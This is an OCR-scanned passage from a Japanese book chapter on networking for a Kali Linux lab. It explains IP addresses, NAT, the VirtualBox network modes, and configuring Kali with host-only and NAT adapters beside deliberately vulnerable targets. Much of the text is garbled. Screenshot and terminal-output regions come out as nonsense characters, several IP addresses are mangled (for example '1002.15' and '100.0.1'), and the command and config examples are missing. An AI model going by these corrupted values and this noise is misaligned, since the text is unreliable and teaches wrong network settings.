Anthy key bindinds 4 
Other input methods 
m17nllb 





図 2-37 設定 後 の Global settings 画 面 
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3 ぅ メニ ュー の 表示 を 確認 する 
ログ イン し 直し ます 。 メ ニュ ー に は | Anthy (UTF-8)」 と |「Direct」 の み が 表 示 
され る よう に な り ま し た ( 図 2-38)。 


④⑨ 7 Anthy (UTF-8) 


() - Direct 





図 2-38 設定 後 の メ ニュ ー 表 示 


ネッ トワ ー ク の 設定 

ネッ トワ ー ク を 設定 する に は 、IP ア ドレ ス の 知識 が 必須 と な り ま す 。 こ こ で は 
IP アド レス に つい て 簡単 に 復 習 し て か ら 、Kalii の ネッ トワ ー ク の 設定 に つい て 解 
説 し ます 。 


介 IP アド レス と は 


IP アド レス と は 、 ネ ットワーク に 接続 し て いる 端末 に 割り 当て られ る 識別 番号 
で す 。 直感 的 に は 、 ネ ットワーク に お ける 住所 の よう な も の で す 。 郵便 物 を 配送 
する と き に は 、 宛 先 と 送付 元 の 住所 を 記載 し ます 。 こ れ に より 、 ど こ か ら ど こ に 
送ら れ だ か が は っ きり し ます 。 ネ ットワーク に お いて は 、IP ア ドレ ス を も と に 
デー タ の 宛 先 と 送信 元 が 決ま り ま す 。 

IP アド レス に は 、TIPv4 と IPvV6 が あり ます 。 現在 は IPv4 が 広く 利用 きれ て お り 、 
本 書 で も 基本 的 に は IPv4 で 解説 し ます 。IPv4 は 、8 ビ ッ ト が 4 つ 並 ん だ も の で す 。 
つま り 、0~-255 の 10 進 数 の 数 字 を 4 つ 並 べた も の に な り ま す ("20)。 例 えば 、 
「10.1.1.1] や 「192.168.1.100] は IP アド レス で す が 、「1000.300] は IP アド レス に 
な り ま せん 。 

同一 ネッ トワ ー ク 内 に 同一 の IP アド レス が 存在 する と 、 デ ー タ の 配信 に 混乱 が 


20 : 8 ビット あれ ば 、0 か ら 255 (=28 一 1 =256 一 1) まで の 数 字 を 表現 で きま す 。 
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生じ て し まう た め 、 茜 止 さ れ て いま す 。 こ の 意味 で 、IP ア ドレ ス は 端末 ご と に ユ 
ニー ク (一 意 ) に 割り 当て られ ます 。 


@LAN アダ プター と IP アド レス 

IP アド レス は コン ビュ ー タ に 割り 当て る と いい まし た が 、 厳 寄 に は コン ビュ ー 
タ に 備わっ て いる LAN ア ダ プ ター に 割り 当て られ ます 。 LAN ア ダブ プター と は 、 通 
信 の た め の イ ンタ ー フ ェ ー ス で す 。LAN カ ー ド や NIC (Network Interface Card) 
と 呼ば れる こと も あり ます が 、 カ ー ド 型 以 外 に USB 型 な ども ある た め 、 本 書 で は 
LAN デ ダブ プター で 統一 する こと に し ます で 21)。 

有線 LAN の LAN ア ダ プ ター で あれ ば 、LAN ケ ー ブ ル を 接続 する 接続 ポ ボート 
(ボー ト と 略す ) が あり ます 。 ま た 、 無線 LAN の LAN ア ダ プ ター で あれ ば 、 ポ ー 
ト は あり ませ ん が 、 ア ン テ ナ が あり ます 。 一 見 し て 存在 を 確認 で き な く て も 内 部 
に アン テ ナ が 備わっ て いま す 。 

] 台 の 端末 に 複数 の LAN ア ダ プ ター が 装着 され て いれ ば 、 そ の コン ビュ ー タ に 
は 複数 の IP アド レス が 割り 当て られ て いる こと に な り ま す 。 


@LAN と WAN 


LAN (Local Area Network) と は 、 限 定 さ れ た 領域 に お ける ネッ トワ ー ク の こ 
と で す 。 家庭 や 社内 に お ける ネッ トワ ー ク は 、LAN に 該当 し ます 。 一 方 、WAN 
(Wide Area Network) と は 、 広 い 領域 に お ける ネッ トワ ー ク の こと で す 。 一 般 に 
は イン ター ネッ ト と 同義 と 考え て も 支障 あり ませ ん 。 


@ クロ ー バ ル IP アド レス と プラ イベ ー ト IP アド レス 


グロ ー バ ル IP ア ドレ ス と は 、WAN で 用 いら れる IP アド レス で す 。 一 方 、 プ ラ 
イベ ー ト IP アド レス と は 、LAN で 用 いら れる IP アド レス で す 。 使用 で きる プラ イ 
ベー ト 1IP ア ドレ ス は 、 仕 様 で 次 の よう に 決め られ て いま す 。 一 般 の 家庭 の LAN で 
あれ ば 、|192.1680.0 一 192.1680.255| ある い は |192.168.1.0 一 192.168.1.255」 を 使用 
し て いる こと が 多い で し ょ う 。 


*21 : 一 般 に は 、 カ ー ド 型 以 外 の LAN ア ダ プ ター に 対し て も LAN カ ー ド や NIC と 呼ぶ こと が 多い 
と いえ ます 。 
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*・ 10.0.0.0 一 10.255.255.255 (10.0.0.0/8) 


* 172.16.0.0 一 172.31.255.255 


172.16.0.0/12) 


・ 192.168.0.0 一 192.168.255.255 (192.168.0.0/16) 


PowerShel で jpconfig コ ヾ 


男 包 コ マツ ド プロップ ト 
Microso1t Windaows LVersion 10.! 
c】 旬 18 Mcrosntt Lorporat iom. , 


っ 
= 


II 10 ココ gol0-3lge nyleooeJals 


P 橋 成 


| | 1 
WITCCOWS 


ドン アル た だり) ナコ 
し さけ YKG こ か も の! さち)) 





DNS サ 


換 技 回 の 
ザ 」 FtuUB | Hox 


5 77542 わ "2 


TP vV6 


デア ドレス リー 





| losst し Li | | ッ 


=2I*・ 


ぉ twork 衣 : 


sdl5: 73oc%』『/ 


5i 和 1 和 1: 





接続 固有 の の | INS け フ 


ireless LN adapter 中 十 |: 


仁 統 国有 の ) INS サフ 





4 


> YE=rFs\ nuS Tom2 


Lh に 


2-39 ipconfig コマ ンド の 結果 





066 


240dD: 


本 _L_ る J リ 。 
・ 和 fs: 


リコ 
と 37 アピ コン ルリ ) ナコ 


し 久 | 1 ま せ で 


0:L59f: Ke 51elire 
* 015:526S bb 邊 :、 
: dcr:906]1:93 
と DU/ iCCU nlRFEUD SEE に 邊 2 
2h[I7: cc00:f6 aa・ 』c5c:ad お 1. 
に ト 442 %15 
= IP アド レス 


:1266 B:82 2 fe:c 小 5%15 
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方 、Linux で IP アド レス を 確認 する に は 、Terminal で ifconfig コ マン ド や jp 


addr show コマ ンド (ipa と せ る ) を 実行 し ます ( 図 2-40) 


ii リリ リル アコ ロリ アァ < 
Id View Search Terminal Help 


UP .BRDADCAS |, RUNNTNG, な tu 1506 
net 員 ask J55.255 . broadCast 192.168.1.255 
4 : : て CO00:a06:27ff: Tai dc prefixLen 64 scope1d Ox6@<qdLob 


1net6 fe86 : :a0D:27ff:feC5:d1C Drefixten 64 SsCODe1d 6xX20<L1inK> 
ether D8:G9:27:CS:9d:1C て tXqueUeGLen 19D9O (Ethernet」 

RX packets 2199288 bytes 2273204653 【2.1 GiB) 

RX errorS G droppecd 0 overruns G frame 6 

TX packets 383185 bytes 32239650 (30.7 M1B) 

TX erTrTOFTS 9  dFODDeO 9 OVeTFrUHS 9 Carr1er 9 COLI1s1ionS 6 


ftaqs=4163<UP , BRDADCAST, RUNNTNG, MULTICAST> mtu 1566 
1net 19.0.0.2 netmasK 255.255.255.0 broadcast 10.09.0.255 
let6 fe8G@: :a0D:271f:fe77:de5a Dreflxten 64 SCOne1d DBx20<1 
ether D8:GO:2/://:de:5a txqueueten 19D9 (Ethernet 
RX packKets 401957 bytes 35600784 (33.9 MiB」 
RX errors 96 droppecd 6 overruns G framec 9 
TX paCKets 693189 bytes 47942880 (45.7 MiB」 
IX erFOFS 6 dFODDed 9 0OVerFIRS 9 CaFF1eT 9 COLL1S1O0nS G 
deV1Ce 1nterrupt 16 base @xd240 





「 Lad5=73<UP,LOOPBACK, RUNNING> mtu 65536 
1net 127.9.9.1 netmaSsSkK 255.9. け . ワム A と とる ilE り ) ナコ 
1net6 ::1 DrFef1xXLen 128 SCODe1d GOX19<hOSt> 
Loop txqueuetLen 1960 (Local Loopback) 
RX pacKets 19279 bytes 51159202 (48.7 MnB ) 
RX erTFOFTS 9  dFODDeO 6 OVerrUTS @ frame @ 
IX DacKets 192/79 bytes 51159292 (48./ M1B) 
TX error5 G dropped 9 overrun5 0 carr1er 9 Cotlnsion5s 6 





図 2-40 放 Config コマ ンド の 結果 


し AN と WA の 1} 培 7 ト 【 こ は っ 艇 に ル 8 ダ で と し * = ネ ツ ヅ 箇 「 リ ー グ 3S ほす ん 


ニー デー 3 コー 
濾 っ = が 存在 し ま 

EH アム 2 ii Ii 」 ティ 。 +。 で トト うー ンチ ョ 衣 、 う ンー ィ <』 ロー - me ンー に |」 1 
ョ ぁ ル か ダ CV は w まま / -、 こう 不 / ト ョ リプ ZN ノ (すむ 日 1 講 末 J ん た) / ly W ) の ) プ ) 機 ーー N。 1 プン = ョ リ w リ レ コー 


ター に は 少な く と も 2 つの 接続 ボー ト が あり ます 。1 つ は WAN に 接続 され 、 も う 
1 つ は LAN に 接続 され ます 。 実際 の ルー ター の 背面 に は 、 WAN ある い は 
TJNTERNET と いう 刻印 の ある 接続 ボー ト と 、LAN と 刻印 の ある 複数 の 接続 


ボー ト が ある は ず で す ( 図 241) (22)。 


本 プン シン 了 1 1 ー- - ユ AN 側 ) ト |] た に 【 け ナ ト な 覆 数 本 ビィ 1 これ は の 機能 を 朋 
還 る だ めで 3 まり 、 複数 の 接続 : 存在 し ます 』 部 的 に プラ ィ ト IP ア | 
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ルリ と と た バリ ルト で いよ ヨ ロッ 
切り 替え スイ ッ チ が あり ます 。 








図 2-41 Buffalo 製 ルー ター の 背面 


接続 ボー ト が ある と いう こと は 、 そ れ に IP アド レス が 割り 振ら れ ま す 。 WAN 
出 の ボー ト に は グロ ー バ ル IP ア ドレ ス 、LAN 側 の ボー ト に は プラ イベ ー ト IP ア 
ドレ ス が 割り 当て られ ます 。 グ ロー バル IP アド レス を 確認 する 簡単 な 方 法 は 、 プ 
ラウ ザ の 環境 変数 を チェ ッ ク す る サー ビス に アク セス する こと で す 。 プ ラウ ザ の 
環境 変数 に は 、 グ ロー バル IP アド レス が 含ま れ て いる た めで す 。 代表 的 な サー ビ 
ス と し て は 、 次 が 欠 げ られ ます 。 


確認 くん WhatlsMyIPAddress 


https://wwwugtop.com/sp 骨 .shtml https://whatismyipaddress.com/ 





また 、 ル ー タ ー の 設定 画面 に アク セス し て 、 機 器 状 態 を 確認 し ます 。 そ こ に 
WAN 側 IP ア ドレ ス が 表示 され る は ず で 、 こ れ が ルー ター の グロ ー バ ル IP ア ドレ 
ス に な り ま す ( 図 2-42)。 
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あな た の 情報 ( 巡 認 くん ) 


Dc 1 の り コ ュー 2018 年 07 月 22 口 PWM1G6 時 13 分 OO 穫 




















LT は 3 3 GIF パー, | 
に YE ガオ | 
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riO の NG ロ /5.0 (WinOOwS NT 5.1: WUW6T ) ApOleWebKL/S3 ナ 36 [KRHTK ト TL。 ke DecO) に hfOTIe/65 3325.1 83 
[リア ど ゲル Safsri/537.36 vivadi/1.96.1 147.47 
二 示 ワサ イズ : 1056 x 903mwx 


だ 友 き 74 ビリ ) (norc) / (nonc で ) 





AS SEEN ON: 
PCWorld ドニ ーッ heguardian (MM  usATopAy F3 Di 
UPPPOST』 BuzzFeeo FOAN knsginnloniosl NN 







MY 中 IP LOOKUP 中 縛 Y VPN SELRVICE kdH1II] | WT. に]ESRIIES 『R』 
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Krow he MP addrcss of snother 
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人 後 和 状 計 情報 

遼 法 状 能 
失 続 状 胡 回 線 到 続 
WAN 側 IP ア ドレ ス 210. .182 

拉 徹 先 1 ct 

TH 失 先 p ア ドレ ス 
DNS サー バア ドレ ス 
政 技 状 実 末 接 続 (接続 不可 ) 
WAN 倒 IP アド レス 地 
2 1 2 
接 入 先 2 [接続 定 2] ーーー ー 


DNS サー バア トド トレス ca 


図 2-42 グロ ー バ ル IP ア ドレ ス の 確認 


プラ イベ ー ト IP アド レス と グロ ー バ ル IP ア ドレ ス の 間 で は 、 直 接 通 信 で きま せ 
ん 。 ルータ ー に は NAT (Network Address Translation) 機能 や NAPT (Network 
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Address Port Translation) 機能 が 備わっ て お り 、 こ れ に より LAN か ら イ ンタ ー 
ネッ ト に アク セス し て 、Web ペ ー ジ を 閲覧 で きる の で す 。 

NAT で は 、 グ ロー バル IP アド レス と プラ イベ ー ト IP アド レス が 1 対 1 に 対応 し 
ます 。 そ の た め 、 イ ンタ ーネット に アク セス で きる 端末 は 1 台 だ け に 限定 され て し 
まい ます 。 し か し 、 通 常 LAN 内 に は 複数 の 端末 が 存在 し 、 同 時 に イン ター ネッ ト 
に アク セス で き な け れ ば な り ま せん 。 そ こ で 、NAPT が 用 いら れ ま す 。NAPT は 、 
ポ ボート 番 号 を 使う こと で 、1 つ の グロ ー バ ル IP ア ドレ ス と 複数 の プラ イベ ー ト IP 
アド レス を 対応 きせ ます 。 


食 動 的 IP アド レス と 静 的 IP アド レス 


LAN に 端末 を 所 属さ きせ る た め に 、LAN ア ダ プ ター に IP アド レス を 割り 当て ま 
す 。 IP アド レス の 割り 当て 方 法 と し て 、 静 的 (スタティック) と 動 的 (ダイ ナミ ッ 
ク ) の 2 つの 選択 肢 が あり ます 。 

静 的 は 、LAN ア ダ プ ター に IP アド レス を 手動 で 指定 する 方 法 で す 。 重複 せ ず 
に 、LAN の 範囲 内 に 収まる よう に 設定 し な けれ ば な り ま せん 。 こ うし て 割り 当て 
られ た IP アド レス を 静 的 (固定 ) IP アド レス と いい ます 。 例え を ば 、 リ モー ト ア ク 
セス の 接続 先 と な る 端末 、 ルー ター、 NAS、 プ リン タ 、 サ ー バ ー (DNS サー バー、 
ドメイン コン トロ ー ラ ー を 含む ) な ど は 、 静 的 IP アド レス が 向い て いま す 。 

動 的 は 、LAN ア ダ プ ター に 自動 的 に IP アド レス を 割り 当て る 方 法 で す 。 ルー 
ター に は DHCP (Dynamic Host Configuration Protocol) 機能 が 備わっ て お り 、 こ 
れ を 活用 する こと で 、 設 定 の 手間 が か か ら ず 、 重 複 す る 恐れ も あり ませ ん 。 デメ 
リッ ト は 、DHCP サ ー バ ー が 落ち る と 、IP ア ドレ ス が 割り 当て られ て いな い 端 末 
は 通信 で き な く な る こと で す 。 例え ば 、 ス マ ホ や タブ レッ ト な ど は 、 特 別 な 理由 
が な い 限 り 動 的 ID アド レス が 向い て いる と いえ ます 。 


代 VirtualBox に お ける ネッ トワ ー ク の 種類 


仮想 マシ ン の ネッ トワ ー ク に て 、 仮 想 の LAN ア ダ プ ター を 追加 し た り 、 仮 想 の 
ネッ トワ ー ク を 設定 し た り で きま す 。 割り 当て の プル ダウ ン メ ニュ ー か ら 、 次 の 
ネッ トワ ー ク を 選択 で きま す ( 図 243)。 


・ 未 割り 当て 
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s NAT 

* NAT ネッ トワ ー ク 

・ 内 部 ネッ トワ ー ク 
か の リッ ーー ズ が プター 
リウ ダナ ゲ メ ダー 

* 汎用 ドラ イ バ ー 


( 紀 Unux-2018.3 (64bd) - 人 定 
1 トワ 59 「 
アゲ ブリー | | アア が プター2 了 ダ ガブ ター3 アプ ター1 





ネッ トロ ー リ ア き プー を 有 2 化 (E* 
月 当て 避 
名 前 (MINaT 


> あま 計 (D) 0 の が 





'O 
ホス トオル リー アミ プター 


参上 


ユー ザー イツ ター フェ ー ス 





図 2-43 割り 当て 可能 な ネッ トワ ー ク 一 覧 


未 割り 当て 

未 割 り 当 て は 、 ネ ットワーク アダ プター を 有効 に し ます が 、 通 信 は で き な い 
モー ド で す 。 異常 処理 を 試験 する 際 に 用 いる こと が あり ます が 、 一 般 の 用 途 で は 
用 いら れ ま せん 。 


NAT 

NAT は 、 ホ スト OS の IP アド レス を 共有 し て 、 外 部 の 物理 ネ ホット ワー ク と 接続 
する モー ド で す 。 ホ スト OS と ゲス ト OS の 間 で は VirtualBox が NAT の 役割 を 果 
た し ます 。 イ ンタ ーネット に 接続 する だ け で あれ ば 、NAT で 十分 で す 。 イ ンタ ー 
ネッ ト だ け で な く 、LAN 内 の 端末 に も アク セス で きま す 。 逆 に 、 外 部 ネッ トワ ー 
ク か ら ゲ スト OS に は 直接 アク セス で き な い の で 、 ゲ スト OS を リモ ー ト アク セス 
で きま せん 。 ま た だ た 、 ゲ スト OS 間 で も 通信 で きま せん 。 そ の た め 、 セ キュ リティ の 
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強度 は 高い と いえ ます ("23)。 

ゲス ト OS の ネッ トワ ー ク で は 1002.0/24 が 用 いら れ ま す 。 ゲ スト OS の IP アド 
レス は 1002.15、 仮 想 ル ー タ ー は 1002.2、 ネ ー ム サー バー は 10.0.2.3、TFTP サ ー 
バー は 10024 が 割り 当て られ ます 24)。 ホ スト OS の LAN ア ダ プ ター の IP アド 
レス は 、 環 境 と 設定 に よっ て 異な り ま す (本 書 で は 192.168.1.20) ( 図 2.44) ("25)。 


/ LAN \ 
z ウ ター| 





192.168.1.20 





ー。 豆 間 : 


仮想 ルー ター 仮想 ルー タ ホス ト OS 
10.0.2.2 10.0.2.2 
10.0.2.3 10.0.2.4 10.0.2.3 10.0.2.4 
ネー ム TFTP ネー ム TFTP 
2 ーー アセ ー サー バー ーー すもも nm 
10.0.2.15 10.0.2.15 
ゲス ト OS ゲス ト OS 
2-44 NAT 


NAT ネッ トワ ー ク 

NAT ネッ トワ ー ク は 、 ホ スト OS の IP アド レス を 共有 し て 、 外 部 の 物理 ネッ ト 
ワー ク に 接続 する モー ド で す (*26) 。 ホス ト OS や 外部 ネッ トワ ー ク か ら ゲ スト OS 
に は 、 直 接 ア クセ ス で きま せん 。 ゲ スト OS 間 で NAT ネッ トワ ー ク を 構成 する の 
で 、 ゲ スト OS 間 で は 通信 で きま す 。NAT ネ ットワーク 内 に DHCP サ ー バ ー が あ 


23 : VMware の ネッ トワ リー ク 接 続 の NAT と は 、 意 味 合い が 異な る の で 注意 し て くだ さい 。 
VMware で は 、 仮 想 ネ ットワーク VMnet8 を 通じ て 、 ゲ スト OS 間 で 通信 で きま す 。 


24 : VBoxManage コマ ンド で ネッ トワ リーク アド レス を 変更 で きま す 。 


25 : 厳 容 に は イラ スト の LAN ア ダ プ ター の IP アド レス が 192168.1.20 に な り ま す が 、 ホ スト OS 
の IP アド レス を 強調 する た め に 、 ホ スト OS 側 に 記述 し まし た 。 


*26 : VMware の ネッ トワ ー ク 接続 の NAT と 似 た よう な モー ド と いえ ます 。 
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り 、 ゲ スト OS は 動 的 IP アド レス を 割り 当て る こと も で きま す ( 図 2-45)。 





192.168.1.20 


ホス ト OS 





ゲス ト OS 


図 2-45 NAT ネッ トワ ー ク 


内 部 ネッ トワ ー ク 

内 部 ネッ トワ ー ク は 、 物理 ネ ットワーク と は 独立 し た 、 ゲ スト OS 間 の み の ネ ッ 
トワ ー ク を 構成 する モー ド で す 。 ホ スト OS と ゲス ト OS 間 は 通信 で きま せん 。 通 
信 相 手 が 少 な い 分 、 最 も セキ ュ ア な モー ド と いえ ます 。 

内 部 ネッ トワ ー ク に は 、VirtualBox の DHCP 機 能 が 用 意 き れ て いま せん 。 各 ゲ 
スト OS に 静 的 IP アド レス を 割り 当て る か 、 ゲ スト OS の 1 つ に DHCP サ ー バ ー を 


立ち 上 げ る 必要 が あり ます ( 図 2.46)。 
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すす 


192.168.1.20 


図 2-46 内 部 ネッ トワ ー ク 


ホス ト オ ン リー アダ プター 

ホス ト オ ン リー アダ プター は 、 外 部 ネッ トワ ー ク と は 通信 で きま せん が 、 ホ ス 
ト OS と ゲス ト OS 導 で ネッ トワ ー ク を 構成 する モー ド で す 。 

ホス ト オ ン リー アダ プター に は 、 VirtualBox の DHCP 機 能 が 用 意 さ きれ て いま す 。 


ホス ト オ ン リー アダ プター の 設定 で 指定 し た IP アド レス が 使用 され ます ( 図 247) 
(27)。 





LAN 
アダ プター 
192.168.1.20 


DHCP ホス ト OS 
サー バ パー 
10.0.0.100 属 、、 10.0.0.1 


1 
- 
ー 






10.0.0 10.0.0.3 10.0.0.4 


ゲス ト OS ゲス ト OS ゲス ト OS 


図 2.47 ホス ト オ ン リー アダ プター 


27 : VMWare の ネッ トワ ー ク 接続 の ホス ト オ ン リー 設定 と 同様 で す 。 
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ホス ト オ ン リー アダ プター 同士 で 構成 され る ネッ トワ ー ク を 、 ホ スト オン リー 
ホッ トワ ー ク と 時 ぶ こと に し ます 。 


ブフ リッ ジア ダ プ ター 

ブリ ッ ジ アダ プター と は 、 ゲ スト OS が 外部 の 物理 ネッ トワ ー ク に 直接 接続 する 
モー ド で す 。 物理 ネッ トワ ー ク に お ける スイ ッ チ ング ハブ に 、 ゲ スト OS が 接続 さ 
れ て いる 状況 と 考え る と わか りや すい で す ( 図 2-48)。 





192.168.1.51 





192.168.1.50 





図 2.48 ブリ ッ ジ アダ プター 


汎用 ドラ イ バ ー 
汎用 ドラ イ バ ー と は 、UDP ト ン ネ ル と VDE を 使え る よう に する モー ド で す 。 本 
書 で は 用 いな い の で 解説 を 省略 し ます 。 


VDE native support for VirtnalBox - Virtualsquare 


http://wiki.yirtnalsquare.org/wiki/index.php/VDE_native_support_for_VirtnalBox 





代 本 書 に お ける Kali の ネッ トワ ー ク の 構成 
第 2 章 の テー マ で ある Kali は 、 次 の 要件 を 満た よ す 必要 が あり ます 。 


|. ハッ キン グ 実 験 用 の 内 部 ネッ トワ ー ク に アク セス で きる 
本 書 で 紹介 する ター ゲッ ト 端 末 は 、 多 く の 脆 弱 性 を 備え て いま す 。 特に 、 
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Metasploitable や DVWA な ど は 攻撃 され る こと を 前 提 と し て 作ら れ て いま す 。 同 
ーネット ワー ク 内 に 不正 な ユー ザー が いれ ば 、 簡 単に 攻撃 され て し まい ます 。 
よっ て 、 ハ ッ キ ング の 実験 の た め に 仮想 的 に 用 意 し た 内 部 ネッ トワ ー ク を 用 いま 
ます 。 


唱 . LAN 内 の 端末 に アク セス で きる 
Kalii か ら LAN 内 の 端末 に アク セス で きれ ば 、 脆 充 性 調査 を 行う こと で 、 弱 点 が 
な いか を 調べ られ ます 。 


川 . ホス ト OS か ら Kali に アク セス で きる 
ホス ト OS か ら Kali を アク セス し て 、 操 作 で きる よう に し ます 。 


IV. イン ター ネッ ト に 接続 で きる 
イン ター ネッ ト ア クセ ス は 、 調べ も の を し た り 、 外 部 の サー バー を 調査 し た り 、 
ソフ ト の ダウ ン ロ ー ド や アッ プ デ ー ト に 使っ た り し ます 。 


そこ で Kali に は 、2 つ の 仮想 の LAN ア ダ プ ター を 有効 に し て 、 そ れ ぞ れ に 次 の 
ネッ トワ ー ク 設定 を 割り 当て ます ( 図 249)。 


ホス ト オ ン リー アダ プター 

静 的 IP アド レス (Kali 側 で 設定 する ) 
10.0.0.2 

ハッ キン グ の 実験 用 


NAT 
重 有 IP アド レス 
イン ター ネッ ト や LAN 内 の 端末 と の 接続 用 
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= 


192.168.1.1 LAN 


192.168.1.20 








ホス ト OS 


、10.0.0.1 


10.0.0.100 











ホス ト オ ン リー ネッ トワ ー ク 


図 2-49 本 害 の ネッ トワ ー ク 構成 (Kali 周 辺 ) 


免 IP アド レス の 一 般 的 な 設定 方 法 
こ で は Linux (Debian) に 対す る IP アド レス の 一 MM 設定 方 法 を 解説 し ま 


す 。 Kali に 対す る 実際 の 設定 は その 後 で 解説 する の で 、 ここ は 読む だ け で 問題 あり 
ませ ん 。 


① 設 定 ファ イル を 編集 する 


/etc/network/interfaceSs ファ イル に 対し て 、 次 の よう に 設定 し ます 。 シ ンプ 
ル に LAN ア ダ プ ター は 1 つ し か な いも の と し まし た ("28)。 


*28 : Windows に お ける IP アド レス の 設定 方 法 は 第 4 章 で 解説 し ます 。 ま た 、Kali に お ける 無線 
LAN ア ダ プ ター の IP アド レス の 設定 に つい て も 第 6 章 で 解説 し ます 。 
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動 的 rp ア ドレ ス の 設定 (auto を 利用 ) 





静 的 rr アド レス の 設定 





"The primary network interfiace" の コメ ント アウ ト 以 降 に 注目 し ます ("29)。 
"auto eth0" は 、 シ ステ ム 起 動 時 に イン ター フェ ー ス eth0 を 起動 する 指示 で す 。 そ 
の 次 の 行 の iface で は 、 動 的 IP アド レス で あれ ば "dhcp"、 静 的 IP アド レス で あれ ば 
"static" を 指定 し ます 。 静 的 IP アド レス の 場合 は 、 そ れ 以 降 に 具体 的 な IP アド レス 


"29 : "/etc/network/interfaces= ファ イル の 記述 方 法 に つい て は 、 次 の よう に man コ マン ド で マ 
ニュ アル を 参照 し て くだ さい 。 





また 、 次 の Web ペ ー ジ も 参考 に な り ま す 。 


第 $ 章 ネッ トワ ー ク の 設定 (Debian リ ファ レン ス ) 
https://wwwdebian.org/doc/manuals/debian-reference/ch0S5.ja.huml 
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の 設定 を 記述 し ます 。 

な お 、"auto < イン ター フェ ー ス 名 >" の 代わ り に 、"allow-hotplng く < イン ター 
フェ ー ス 名 >" と 記述 する と 、 カ ー ネ ル が LAN ア ダ プ ター を 認識 し た 際 に イン 
ター フェ ー ス を 起動 し ます 。 つ まり 、 次 の よう に 設定 し て も よい わけ で す 。 





動 的 rP ア ドレ ス の 設定 (a11ow-hotplug を 利用 ) 





(②) 設 定 を 反映 させ る 
設定 ファ イル を 編集 し た ら 、 設 定 を 反映 させ ます 。 auto 指 定 の 場合 に は 、 次 の 
コマ ンド で 反映 で きま す 。 





また 、allow-hotplug 指定 の 場合 に は 、 次 の コマ ンド を 実行 し ます 。 





な お 、allow-hotplug 指定 の 場合 に 、 誤っ て /etc/init.d/networking restart コマ ン 
ド を 実行 する と 、eth0 と eth1 が 落ち て 、 立 ち 上 が り ま せん 。 そ こ で 、 jifp コ マン 
ド で 1 つ ず つ ネ ットワーク デバ イス を 立ち 上 げ ま す 。 
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この と き 、"RTNETLINK answers: File exists' と 表示 され て いて も 、 ifconfig コ 
マン ド で 確認 する と IP アド レス は 割り 当て られ て お り 、 ネ ットワーク に 問題 は あ 
り ま せん 。 気 に な る 場合 に は 、 次 の コマ ンド で 解消 で きま す 。 


# ip addr flush dev < イン ター フェ ー ス 名 > 


@ Kali に 2 つの LAN アダ プター を 設定 する べく 動 的 IP アド レス 編 > 


最終 的 に は 、Kalii に 2 つの LAN ア ダ プ ター を 設定 し 、 そ れ ぞ れ に 静 的 IP アドレ 
ス を 設定 する こと が 目標 に な り ま す 。 

し か し な が ら 、Kali に 複数 の LAN ア ダ プ ター を 設定 する 際 に 、 少 々 気 を 付け る 
こと が あり ます 。 こ れ を 確認 する た め に 、 ま ず は 2 つの LAN ア ダ プ ター を 設定 し 、 
動 的 IP アド レス を 割り 当て る こと を 最初 の 目標 と し ます 。 


①) 仮 想 LAN アダ ブタ ー を 追加 する 
Kai の 仮想 マシ ン の 設定 に て 、 仮 想 LAN ア ダ プ ター を 追加 し ます 。 最終 的 に 
ネッ トワ ー ク の 設定 は 次 の よう に な り ま す 。 


割り 当て : ホス ト オ ン リー アダ プター 
名 前 : VirtualBox Host-Only Ethernet Adapter ("30) 
高度 : 

ケー ブル 接続 チェ ッ ク 


者 り 当て : NAT 
高度 : 
ケー ブル 接続 チェ ッ ク 





(② ホス ト オ ン リー ネッ トワ ー ク を 設定 する 
VirtualBox の バー ジョ ン に よっ て 、 ホ スト オン リー ネッ トワ ー ク の 設定 箇所 が 


*30: ホス ト オ ン リー ネッ トワ ー ク の 作成 時 に 「#21 が 付い て いれ ば 、 ここ で は "VirtualBox Host- 
Only Ethernet Adapter #2" を 指定 し ます 。 
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違い ます 。 簡単 な 見 分 け 方 は 、VirtualBox の メイ ン 画 面 に て 、 メ ニュ ー の 「 フ ァ 
イル | を 開き 、 そ こ に 「 ホ スト ネッ トワ ー ク マネ ー ジ ャ ー」 が 存在 する か を 確認 


し ます 。 存在 すれ ば 、 こ こ か ら 設 定 し ます 。 存在 し な けれ ば 、「 環 境 設定 」 か ら 設 
定 し ます 。 


A. ホ スト ネッ トワ ー ク マネ ー ジ ャ ー が 存在 し な い 場 合 
VirtualBox の メイ ン 画 面 に て 、 メ ニュ ー の 「 フ ァイル | > 「 環 境 設定 | で 
[ネッ トワ ー ク 」 を 選択 し ます 。「 ホ スト オン リー ネッ トワ ー ク 」 タプ を 選択 


し て 、 右側 の 「+」 アイ コン か ら 、 "VirtualBox Host-Only Ethernet Adapter" 
を 追加 し ます ( 図 2-50)。 


JHNA = の | ホメ ト オ ン リー ネッ トコ ー 炊 Hi 


|yitusiBox Host-Only Ethernet Adgpter | 























図 2.50 ネッ トワ ー ク の 設定 画面 


追加 で きた ら 、 ド ライ バー アイ コン を 押し て 、 設 定 を 編集 し ます 。「 ホ スト 
オン リー ネッ トワ ー ク の 詳細 」 画面 が 開き ます 。|「 ア ダ プ ター」 タプ を 開き 、 
ホス ト オ ン リー ネッ トワ ー ク に お ける ホス ト OS 側 の LAN ア ダ プ ター の 設定 
を し ます ("31) 。 IPvV4 ア ドレ ス に 100.0.1、IPv4 ネッ トマ スク に 255.255.255.0 
を 指定 し ます ( 図 2-51) 。 


*31 : ホス ト OS 側 に お ける ネッ トワ リーク アダ プター の 一 覧 に 、"VirtnalBox Host-Only Ethernet 
Adapter" が 表示 され ます 。 
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アタ ブ ヨー[A) [ DHP サー\-(D) 」 


Pu4 アド LM(0 160 昌 
1Py4 ネッ トマ AA 256 256 2 


jPyb アド し 1 


IFPv5 ネッ トマ で ふり 兵 仙 





図 2.51 「 ア ダ プ ター」| タブ の 設定 


次 に IDHCP サ ー バ ー」 タプ を 開き 、 ホ スト オン リー ネッ トワ ー ク 内 の 
DHCP サ ー バ ー の 設定 を 行い ます 。DHCP サー バー の IP アド レス は 100.0.100 


と し 、 動 的 に 割り 当て られ る IP アド レス の 範囲 は 100.0.101 一 10.0.0.254 と し ま 
す ( 図 2-52)。 





[E225=(0 』。 CCP サー バーOD | 
| | 了 サ - バ ー を KK) 
サー バー アド ZNRy 10M010W 
サー バー マス MD 255255235n 





フ ド レス 下 陣 (U 160.101 
アド ルス 上 明 (Uk 100254 








図 2-52 「[DHCP サ ー バ ー」 タブ の 設定 


B. ホ スト ネッ トワ ー ク マネ ー ジ ャ ー が 存在 する 場合 

VirtualBox の メイ ン 画 面 に て 、 メ ニュ ー の 「 フ ァイル 」 > 「 ホ スト ネッ ト 
ワーー ク 2 ネー ジャ ー1 で ネットワーク | お 選択 し まき 。 

